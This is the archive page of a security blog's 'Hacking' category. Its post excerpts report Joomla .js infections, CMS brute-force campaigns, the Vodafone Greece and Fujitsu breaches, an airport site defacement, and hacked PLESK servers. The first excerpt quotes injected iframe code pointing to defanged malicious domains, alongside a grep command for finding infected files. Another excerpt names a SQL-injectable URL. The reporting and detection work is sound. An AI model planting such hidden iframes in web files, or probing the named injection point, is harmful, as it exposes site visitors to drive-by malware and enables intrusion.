Archive for 'Hacking'

New joomla infections (?) mustmoneyback.cgi

Today looking at some systems I notice a new pattern on some .js files. Multiple files were infected with the following code:
;document.write(‘<iframe src=”hxxp://hfxgr.sellClassics.com/mustmoneyback.cgi?3″ align=”center” height=”5″ width=”5″></iframe>’);
;document.write(‘<iframe src=”hxxp://lenslifcs.mynumber.org/mustmoneyback.cgi?3″ align=”center” height=”5″ width=”5″></iframe>’);
and other domains were found also with the same .cgi file calls. An easy way to look for infections on PLESK systems is the following:
find /var/www/vhosts/ -type f -name ‘*.js’ -print0 | xargs -0 egrep -iw “(km0ae9gr6m|mustmoneyback)”
After locating the infections one can clean up the files …

Continue Reading →
0

WordPress/joomla CMS brute force attacks (more than 25k sites)

It came to our notice today a targeted bruteforce attack on worpress/joomla/drupal and other CMS based websites. The list of the attacked hosts contains more than 25000 websites (http://my-audit.gr/attacked_cms_list.html) and considering that it’s starting from the letter m and below this appears to be just a part of a larger document.
The attack is being initiated through compromised windows systems where the following files are being uploaded:
30/03/2012  08:57 πµ           624.640 ctfmon.exe
25/09/2012  03:13 µµ                 0 good.txt
21/07/2012  12:50 µµ                 …

Continue Reading →
1

Vodafone Greece hacked…

ΖΗΜΙΑ ΠΟΥ ΑΓΓΙΖΕΙ ΤA 690.000 ΕΥΡΩ
ΑΠΑΤΗ ΣΕ ΒΑΡΟΣ ΤΗΣ VODAFONE
Με το ποσό των 690 χιλιάδων ευρώ ζημιώθηκε η Vodafone από τη μη καταγραφή χρήσης mobile internet που πραγματοποιήθηκε μέσω του δικτύου της. Το γεγονός έγινε γνωστό από τη Δίωξη Ηλεκτρονικού Εγκλήματος ως εξής: Με προηγμένη μέθοδο ηλεκτρονικής διείσδυσης, τύπου cracking, στα υπολογιστικά συστήματα της εταιρείας, οι εμπλεκόμενοι αποκτούσαν πρόσβαση στα δεδομένα διαχείρισης και πωλούσαν παράνομα στην Κούβα συνδέσεις στο διαδίκτυο. Ειδικότερα, οι τρεις δράστες κατάφεραν να διεισδύσουν ηλεκτρο- …

Continue Reading →
0

Fujitsu hacked by Anonymous..

As reported on pastebin.com, Fujitsu general DB’s leaked last week.
http://pastebin.com/1YMJPa8h
The method used was SQL Injection on
http://www.fujitsugeneral.com.br/onde-encontrar.aspx?estado=UF&cidade=cidade&bairro=bairro&tabela=Revendas which seems to have been corrected at this point but this is once again an example on how vulnerable our personal information is and how cautious we must be as far as posting our personal details is even in big and trustful sites.
Let us not forget what happened last year with Sony, even if Fujitsu has much less information on …

Continue Reading →
0

Greece International Airport (AIA / El. Venizelos) hacked!!

Last night Iranian hackers compromised AIA’s page, demonstrating once again how loosen the security is in major Greek sites.
As said in the past, in Greece organisations and government are paying a lot of money for simple web site development and promotion but are not considering the security at all.
Up to this minute www.aia.gr remains hacked (and will probably remain until tomorrow), my-audit.gr has informed the Airport security for this hack but as usual we are not expecting any …

Continue Reading →
0

3.094 Hacked PLESK servers, more than 15.000 domains and this is just 3%

I wrote again about the infected PLESK systems, Brian Krebs wrote about the topic some time later in the year (http://krebsonsecurity.com/2012/07/plesk-0day-for-sale-as-thousands-of-sites-hacked/) but until now I didn’t see any post on the actual infected servers.
I took some time during the holidays to fix my http-plesk-backdoor.nse script and make a more wide search for infected and still compromised PLESK installations. The work is still in progress and the stats below are rough stats.
There are 256 A class networks , 0.0.0.0/8 …

Continue Reading →
0
Page 1 of 16 12345...»